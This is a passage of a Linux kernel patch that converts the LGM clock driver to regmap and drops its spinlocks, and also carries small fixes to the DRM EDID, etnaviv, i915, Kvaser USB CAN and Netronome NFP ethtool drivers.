+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+ 	u32 div, ddiv1, ddiv2;
+-	unsigned long flags;
+ 
+ 	div = DIV_ROUND_CLOSEST_ULL((u64)prate, rate);
+ 
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		div = DIV_ROUND_CLOSEST_ULL((u64)div, 5);
+ 		div = div * 2;
+ 	}
+ 
+-	if (div <= 0) {
+-		spin_unlock_irqrestore(&ddiv->lock, flags);
++	if (div <= 0)
+ 		return -EINVAL;
+-	}
+ 
+-	if (lgm_clk_get_ddiv_val(div, &ddiv1, &ddiv2)) {
+-		spin_unlock_irqrestore(&ddiv->lock, flags);
++	if (lgm_clk_get_ddiv_val(div, &ddiv1, &ddiv2))
+ 		return -EINVAL;
+-	}
+ 
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg, ddiv->shift0, ddiv->width0,
+ 			ddiv1 - 1);
+ 
+ 	lgm_set_clk_val(ddiv->membase, ddiv->reg,  ddiv->shift1, ddiv->width1,
+ 			ddiv2 - 1);
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	return 0;
+ }
+@@ -533,18 +493,15 @@ lgm_clk_ddiv_round_rate(struct clk_hw *hw, unsigned long rate,
+ {
+ 	struct lgm_clk_ddiv *ddiv = to_lgm_clk_ddiv(hw);
+ 	u32 div, ddiv1, ddiv2;
+-	unsigned long flags;
+ 	u64 rate64;
+ 
+ 	div = DIV_ROUND_CLOSEST_ULL((u64)*prate, rate);
+ 
+ 	/* if predivide bit is enabled, modify div by factor of 2.5 */
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		div = div * 2;
+ 		div = DIV_ROUND_CLOSEST_ULL((u64)div, 5);
+ 	}
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	if (div <= 0)
+ 		return *prate;
+@@ -558,12 +515,10 @@ lgm_clk_ddiv_round_rate(struct clk_hw *hw, unsigned long rate,
+ 	do_div(rate64, ddiv2);
+ 
+ 	/* if predivide bit is enabled, modify rounded rate by factor of 2.5 */
+-	spin_lock_irqsave(&ddiv->lock, flags);
+ 	if (lgm_get_clk_val(ddiv->membase, ddiv->reg, ddiv->shift2, 1)) {
+ 		rate64 = rate64 * 2;
+ 		rate64 = DIV_ROUND_CLOSEST_ULL(rate64, 5);
+ 	}
+-	spin_unlock_irqrestore(&ddiv->lock, flags);
+ 
+ 	return rate64;
+ }
+@@ -600,7 +555,6 @@ int lgm_clk_register_ddiv(struct lgm_clk_provider *ctx,
+ 		init.num_parents = 1;
+ 
+ 		ddiv->membase = ctx->membase;
+-		ddiv->lock = ctx->lock;
+ 		ddiv->reg = list->reg;
+ 		ddiv->shift0 = list->shift0;
+ 		ddiv->width0 = list->width0;
+diff --git a/drivers/clk/x86/clk-cgu.h b/drivers/clk/x86/clk-cgu.h
+index 4e22bfb223128..bcaf8aec94e5d 100644
+--- a/drivers/clk/x86/clk-cgu.h
++++ b/drivers/clk/x86/clk-cgu.h
+@@ -1,28 +1,28 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ /*
+- * Copyright(c) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
++ * Copyright (C) 2020 Intel Corporation.
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ 
+ #ifndef __CLK_CGU_H
+ #define __CLK_CGU_H
+ 
+-#include <linux/io.h>
++#include <linux/regmap.h>
+ 
+ struct lgm_clk_mux {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	u8 width;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_divider {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	u8 width;
+@@ -30,12 +30,11 @@ struct lgm_clk_divider {
+ 	u8 width_gate;
+ 	unsigned long flags;
+ 	const struct clk_div_table *table;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_ddiv {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift0;
+ 	u8 width0;
+@@ -48,16 +47,14 @@ struct lgm_clk_ddiv {
+ 	unsigned int mult;
+ 	unsigned int div;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ struct lgm_clk_gate {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	u8 shift;
+ 	unsigned long flags;
+-	spinlock_t lock;
+ };
+ 
+ enum lgm_clk_type {
+@@ -77,11 +74,10 @@ enum lgm_clk_type {
+  * @clk_data: array of hw clocks and clk number.
+  */
+ struct lgm_clk_provider {
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	struct device_node *np;
+ 	struct device *dev;
+ 	struct clk_hw_onecell_data clk_data;
+-	spinlock_t lock;
+ };
+ 
+ enum pll_type {
+@@ -92,11 +88,10 @@ enum pll_type {
+ 
+ struct lgm_clk_pll {
+ 	struct clk_hw hw;
+-	void __iomem *membase;
++	struct regmap *membase;
+ 	unsigned int reg;
+ 	unsigned long flags;
+ 	enum pll_type type;
+-	spinlock_t lock;
+ };
+ 
+ /**
+@@ -202,6 +197,8 @@ struct lgm_clk_branch {
+ /* clock flags definition */
+ #define CLOCK_FLAG_VAL_INIT	BIT(16)
+ #define MUX_CLK_SW		BIT(17)
++#define GATE_CLK_HW		BIT(18)
++#define DIV_CLK_NO_MASK		BIT(19)
+ 
+ #define LGM_MUX(_id, _name, _pdata, _f, _reg,		\
+ 		_shift, _width, _cf, _v)		\
+@@ -300,29 +297,32 @@ struct lgm_clk_branch {
+ 		.div = _d,					\
+ 	}
+ 
+-static inline void lgm_set_clk_val(void __iomem *membase, u32 reg,
++static inline void lgm_set_clk_val(struct regmap *membase, u32 reg,
+ 				   u8 shift, u8 width, u32 set_val)
+ {
+ 	u32 mask = (GENMASK(width - 1, 0) << shift);
+-	u32 regval;
+ 
+-	regval = readl(membase + reg);
+-	regval = (regval & ~mask) | ((set_val << shift) & mask);
+-	writel(regval, membase + reg);
++	regmap_update_bits(membase, reg, mask, set_val << shift);
+ }
+ 
+-static inline u32 lgm_get_clk_val(void __iomem *membase, u32 reg,
++static inline u32 lgm_get_clk_val(struct regmap *membase, u32 reg,
+ 				  u8 shift, u8 width)
+ {
+ 	u32 mask = (GENMASK(width - 1, 0) << shift);
+ 	u32 val;
+ 
+-	val = readl(membase + reg);
++	if (regmap_read(membase, reg, &val)) {
++		WARN_ONCE(1, "Failed to read clk reg: 0x%x\n", reg);
++		return 0;
++	}
++
+ 	val = (val & mask) >> shift;
+ 
+ 	return val;
+ }
+ 
++
++
+ int lgm_clk_register_branches(struct lgm_clk_provider *ctx,
+ 			      const struct lgm_clk_branch *list,
+ 			      unsigned int nr_clk);
+diff --git a/drivers/clk/x86/clk-lgm.c b/drivers/clk/x86/clk-lgm.c
+index 020f4e83a5ccb..f69455dd1c980 100644
+--- a/drivers/clk/x86/clk-lgm.c
++++ b/drivers/clk/x86/clk-lgm.c
+@@ -1,10 +1,12 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
++ * Copyright (C) 2020-2022 MaxLinear, Inc.
+  * Copyright (C) 2020 Intel Corporation.
+- * Zhu YiXin <yixin.zhu@intel.com>
+- * Rahul Tanwar <rahul.tanwar@intel.com>
++ * Zhu Yixin <yzhu@maxlinear.com>
++ * Rahul Tanwar <rtanwar@maxlinear.com>
+  */
+ #include <linux/clk-provider.h>
++#include <linux/mfd/syscon.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
+ #include <dt-bindings/clock/intel,lgm-clk.h>
+@@ -253,8 +255,8 @@ static const struct lgm_clk_branch lgm_branch_clks[] = {
+ 	LGM_FIXED(LGM_CLK_SLIC, "slic", NULL, 0, CGU_IF_CLK1,
+ 		  8, 2, CLOCK_FLAG_VAL_INIT, 8192000, 2),
+ 	LGM_FIXED(LGM_CLK_DOCSIS, "v_docsis", NULL, 0, 0, 0, 0, 0, 16000000, 0),
+-	LGM_DIV(LGM_CLK_DCL, "dcl", "v_ifclk", 0, CGU_PCMCR,
+-		25, 3, 0, 0, 0, 0, dcl_div),
++	LGM_DIV(LGM_CLK_DCL, "dcl", "v_ifclk", CLK_SET_RATE_PARENT, CGU_PCMCR,
++		25, 3, 0, 0, DIV_CLK_NO_MASK, 0, dcl_div),
+ 	LGM_MUX(LGM_CLK_PCM, "pcm", pcm_p, 0, CGU_C55_PCMCR,
+ 		0, 1, CLK_MUX_ROUND_CLOSEST, 0),
+ 	LGM_FIXED_FACTOR(LGM_CLK_DDR_PHY, "ddr_phy", "ddr",
+@@ -433,13 +435,15 @@ static int lgm_cgu_probe(struct platform_device *pdev)
+ 
+ 	ctx->clk_data.num = CLK_NR_CLKS;
+ 
+-	ctx->membase = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(ctx->membase))
++	ctx->membase = syscon_node_to_regmap(np);
++	if (IS_ERR(ctx->membase)) {
++		dev_err(dev, "Failed to get clk CGU iomem\n");
+ 		return PTR_ERR(ctx->membase);
++	}
++
+ 
+ 	ctx->np = np;
+ 	ctx->dev = dev;
+-	spin_lock_init(&ctx->lock);
+ 
+ 	ret = lgm_clk_register_plls(ctx, lgm_pll_clks,
+ 				    ARRAY_SIZE(lgm_pll_clks));
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index b36abfa915813..9d82de4c0a8b0 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5827,7 +5827,8 @@ static void drm_parse_hdmi_forum_scds(struct drm_connector *connector,
+ 			else if (hf_scds[11] & DRM_EDID_DSC_10BPC)
+ 				hdmi_dsc->bpc_supported = 10;
+ 			else
+-				hdmi_dsc->bpc_supported = 0;
++				/* Supports min 8 BPC if DSC 1.2 is supported*/
++				hdmi_dsc->bpc_supported = 8;
+ 
+ 			dsc_max_frl_rate = (hf_scds[12] & DRM_EDID_DSC_MAX_FRL_RATE_MASK) >> 4;
+ 			drm_get_max_frl_rate(dsc_max_frl_rate, &hdmi_dsc->max_lanes,
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+index 55479cb8b1ac3..67bdce5326c6e 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+@@ -80,10 +80,10 @@ static int etnaviv_iommu_map(struct etnaviv_iommu_context *context, u32 iova,
+ 		return -EINVAL;
+ 
+ 	for_each_sgtable_dma_sg(sgt, sg, i) {
+-		u32 pa = sg_dma_address(sg) - sg->offset;
++		phys_addr_t pa = sg_dma_address(sg) - sg->offset;
+ 		size_t bytes = sg_dma_len(sg) + sg->offset;
+ 
+-		VERB("map[%d]: %08x %08x(%zx)", i, iova, pa, bytes);
++		VERB("map[%d]: %08x %pap(%zx)", i, iova, &pa, bytes);
+ 
+ 		ret = etnaviv_context_map(context, da, pa, bytes, prot);
+ 		if (ret)
+diff --git a/drivers/gpu/drm/i915/i915_pci.c b/drivers/gpu/drm/i915/i915_pci.c
+index 34f2d9da201e2..fe4f279aaeb3e 100644
+--- a/drivers/gpu/drm/i915/i915_pci.c
++++ b/drivers/gpu/drm/i915/i915_pci.c
+@@ -1130,7 +1130,6 @@ static const struct intel_gt_definition xelpmp_extra_gt[] = {
+ 	{}
+ };
+ 
+-__maybe_unused
+ static const struct intel_device_info mtl_info = {
+ 	XE_HP_FEATURES,
+ 	XE_LPDP_FEATURES,
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+index f688124d6d669..ef341c4254fc8 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+@@ -545,6 +545,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 					    u8 cmd_no, int channel)
+ {
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -552,6 +553,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = cmd_no;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	if (channel < 0) {
+ 		kvaser_usb_hydra_set_cmd_dest_he
+ 				(cmd, KVASER_USB_HYDRA_HE_ADDRESS_ILLEGAL);
+@@ -568,7 +570,7 @@ static int kvaser_usb_hydra_send_simple_cmd(struct kvaser_usb *dev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -584,6 +586,7 @@ kvaser_usb_hydra_send_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_ATOMIC);
+@@ -591,14 +594,14 @@ kvaser_usb_hydra_send_simple_cmd_async(struct kvaser_usb_net_priv *priv,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = cmd_no;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd_async(priv, cmd,
+-					kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd_async(priv, cmd, cmd_len);
+ 	if (err)
+ 		kfree(cmd);
+ 
+@@ -742,6 +745,7 @@ static int kvaser_usb_hydra_get_single_capability(struct kvaser_usb *dev,
+ {
+ 	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	u32 value = 0;
+ 	u32 mask = 0;
+ 	u16 cap_cmd_res;
+@@ -753,13 +757,14 @@ static int kvaser_usb_hydra_get_single_capability(struct kvaser_usb *dev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_CAPABILITIES_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	cmd->cap_req.cap_cmd = cpu_to_le16(cap_cmd_req);
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he(cmd, card_data->hydra.sysdbg_he);
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -1578,6 +1583,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_usb_net_hydra_priv *hydra = priv->sub_priv;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	if (!hydra)
+@@ -1588,6 +1594,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_BUSPARAMS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+@@ -1597,7 +1604,7 @@ static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
+ 
+ 	reinit_completion(&priv->get_busparams_comp);
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		return err;
+ 
+@@ -1624,6 +1631,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1631,6 +1639,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	memcpy(&cmd->set_busparams_req.busparams_nominal, busparams,
+ 	       sizeof(cmd->set_busparams_req.busparams_nominal));
+ 
+@@ -1639,7 +1648,7 @@ static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 
+ 	kfree(cmd);
+ 
+@@ -1652,6 +1661,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+ 	struct kvaser_usb *dev = priv->dev;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1659,6 +1669,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_FD_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	memcpy(&cmd->set_busparams_req.busparams_data, busparams,
+ 	       sizeof(cmd->set_busparams_req.busparams_data));
+ 
+@@ -1676,7 +1687,7 @@ static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 
+ 	kfree(cmd);
+ 
+@@ -1804,6 +1815,7 @@ static int kvaser_usb_hydra_get_software_info(struct kvaser_usb *dev)
+ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ {
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 	u32 flags;
+ 	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
+@@ -1813,6 +1825,7 @@ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_GET_SOFTWARE_DETAILS_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	cmd->sw_detail_req.use_ext_cmd = 1;
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 				(cmd, KVASER_USB_HYDRA_HE_ADDRESS_ILLEGAL);
+@@ -1820,7 +1833,7 @@ static int kvaser_usb_hydra_get_software_details(struct kvaser_usb *dev)
+ 	kvaser_usb_hydra_set_cmd_transid
+ 				(cmd, kvaser_usb_hydra_get_next_transid(dev));
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	if (err)
+ 		goto end;
+ 
+@@ -1938,6 +1951,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ {
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_cmd *cmd;
++	size_t cmd_len;
+ 	int err;
+ 
+ 	if ((priv->can.ctrlmode &
+@@ -1953,6 +1967,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_DRIVERMODE_REQ;
++	cmd_len = kvaser_usb_hydra_cmd_size(cmd);
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+ 	kvaser_usb_hydra_set_cmd_transid
+@@ -1962,7 +1977,7 @@ static int kvaser_usb_hydra_set_opt_mode(const struct kvaser_usb_net_priv *priv)
+ 	else
+ 		cmd->set_ctrlmode.mode = KVASER_USB_HYDRA_CTRLMODE_NORMAL;
+ 
+-	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	err = kvaser_usb_send_cmd(dev, cmd, cmd_len);
+ 	kfree(cmd);
+ 
+ 	return err;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_main.h b/drivers/net/ethernet/netronome/nfp/nfp_main.h
+index afd3edfa24283..b9266cf72a172 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_main.h
++++ b/drivers/net/ethernet/netronome/nfp/nfp_main.h
+@@ -28,6 +28,7 @@ struct nfp_hwinfo;
+ struct nfp_mip;
+ struct nfp_net;
+ struct nfp_nsp_identify;
++struct nfp_eth_media_buf;
+ struct nfp_port;
+ struct nfp_rtsym;
+ struct nfp_rtsym_table;
+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+index 991059d6cb32e..af376b9000677 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
++++ b/drivers/net/ethernet/netronome/nfp/nfp_net_ethtool.c
+@@ -293,6 +293,182 @@ nfp_net_set_fec_link_mode(struct nfp_eth_table_port *eth_port,
+ 	}
+ }
+ 
++static const struct nfp_eth_media_link_mode {
++	u16 ethtool_link_mode;
++	u16 speed;
++} nfp_eth_media_table[NFP_MEDIA_LINK_MODES_NUMBER] = {
++	[NFP_MEDIA_1000BASE_CX] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_1000baseKX_Full_BIT,
++		.speed			= NFP_SPEED_1G,
++	},
++	[NFP_MEDIA_1000BASE_KX] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_1000baseKX_Full_BIT,
++		.speed			= NFP_SPEED_1G,
++	},
++	[NFP_MEDIA_10GBASE_KX4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKX4_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_CX4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseKX4_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_10GBASE_ER] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_10000baseER_Full_BIT,
++		.speed			= NFP_SPEED_10G,
++	},
++	[NFP_MEDIA_25GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_KR_S] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_CR_S] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_25GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_25000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_25G,
++	},
++	[NFP_MEDIA_40GBASE_CR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_KR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_SR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseSR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_40GBASE_LR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_40000baseLR4_Full_BIT,
++		.speed			= NFP_SPEED_40G,
++	},
++	[NFP_MEDIA_50GBASE_KR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseKR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_SR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseSR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_CR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseCR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_LR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_ER] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_50GBASE_FR] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT,
++		.speed			= NFP_SPEED_50G,
++	},
++	[NFP_MEDIA_100GBASE_KR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_SR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseSR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_CR4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_KP4] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseKR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++	[NFP_MEDIA_100GBASE_CR10] = {
++		.ethtool_link_mode	= ETHTOOL_LINK_MODE_100000baseCR4_Full_BIT,
++		.speed			= NFP_SPEED_100G,
++	},
++};
++
++static const unsigned int nfp_eth_speed_map[NFP_SUP_SPEED_NUMBER] = {
++	[NFP_SPEED_1G]		= SPEED_1000,
++	[NFP_SPEED_10G]		= SPEED_10000,
++	[NFP_SPEED_25G]		= SPEED_25000,
++	[NFP_SPEED_40G]		= SPEED_40000,
++	[NFP_SPEED_50G]		= SPEED_50000,
++	[NFP_SPEED_100G]	= SPEED_100000,
++};
++
++static void nfp_add_media_link_mode(struct nfp_port *port,
++				    struct nfp_eth_table_port *eth_port,
++				    struct ethtool_link_ksettings *cmd)
++{
++	u64 supported_modes[2], advertised_modes[2];
++	struct nfp_eth_media_buf ethm = {
++		.eth_index = eth_port->eth_index,
++	};
++	struct nfp_cpp *cpp = port->app->cpp;
++
++	if (nfp_eth_read_media(cpp, &ethm)) {
++		bitmap_fill(port->speed_bitmap, NFP_SUP_SPEED_NUMBER);
++		return;
++	}
++
++	bitmap_zero(port->speed_bitmap, NFP_SUP_SPEED_NUMBER);
++
++	for (u32 i = 0; i < 2; i++) {
++		supported_modes[i] = le64_to_cpu(ethm.supported_modes[i]);
++		advertised_modes[i] = le64_to_cpu(ethm.advertised_modes[i]);
++	}
++
++	for (u32 i = 0; i < NFP_MEDIA_LINK_MODES_NUMBER; i++) {
++		if (i < 64) {
++			if (supported_modes[0] & BIT_ULL(i)) {
